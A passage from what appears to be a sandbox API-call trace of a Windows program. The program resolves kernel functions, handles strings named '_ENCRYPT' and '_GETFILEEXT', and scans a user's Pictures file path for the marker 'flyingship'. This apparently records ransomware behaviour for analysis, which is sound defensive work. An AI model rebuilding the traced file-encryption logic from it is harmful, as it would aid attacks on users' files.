Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.431] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0189.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.431] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.432] CloseHandle (hObject=0x158) returned 1 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0189.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0189.432] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.433] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0189.433] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0189.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.433] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0189.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.434] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0189.434] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0x90add8 [0189.435] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.435] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0xb6ccdc90, ftLastWriteTime.dwHighDateTime=0x1d5e322, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0x90add8 [0189.435] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0189.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LYh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yh\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hluVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="luVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uVFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0189.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VFFklat\\Lu YE0Otm8F.gif\"", cchCount1=10, 